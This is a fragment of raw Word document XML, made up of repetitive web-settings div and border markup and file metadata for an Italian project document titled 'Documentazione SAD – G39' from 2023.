                                            <w:div w:id="275909403">
                                              <w:marLeft w:val="0"/>
                                              <w:marRight w:val="0"/>
                                              <w:marTop w:val="0"/>
                                              <w:marBottom w:val="0"/>
                                              <w:divBdr>
                                                <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                                <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                                <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                                              </w:divBdr>
                                              <w:divsChild>
                                                <w:div w:id="83849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93803058">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="476193418">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="614099212">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1677268351">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="311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8067">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="698550950">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sChild>
            <w:div w:id="11695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8192">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2082016625">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="4728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721">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1072237935">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1106075558">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="143666631">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="306321420">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="93748355">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1253709562">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="222180632">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="17171102">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="18046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7156">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1925451732">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1758599279">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1882325983">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="177818902">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1831821419">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="140928053">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1961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9741">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1471944232">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="419377721">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="958876258">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="584843288">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="513226680">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="913316023">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1019741047">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1773937470">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="123349174">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1958753441">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="696390003">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2131394314">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="13518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0720">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="148790621">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="11499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8558">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1731616400">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1351368260">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1317762936">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1617448535">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="109587615">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1544056022">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1992951575">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="234635420">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="823854767">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2044212225">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="643239221">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="749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9501">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1967464452">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2023049202">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="503865320">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="15110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EEAD-32E1-4AD7-8471-EE727E61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33</Pages>
  <Words>6554</Words>
  <Characters>37361</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Documentazione SAD – G39</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4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AD – G39</dc:title>
  <dc:subject/>
  <dc:creator>ANGELO BARLETTA</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ANGELO BARLETTA</cp:lastModifiedBy>
  <cp:revision>118</cp:revision>
  <cp:lastPrinted>2023-10-14T15:08:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-18T16:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-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9-18T17:13:28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9033f6ed-bf33-40a5-a0ce-d3223bd9baa5</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_2ad0b24d-6422-44b0-b3de-abb3a9e8c81a_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>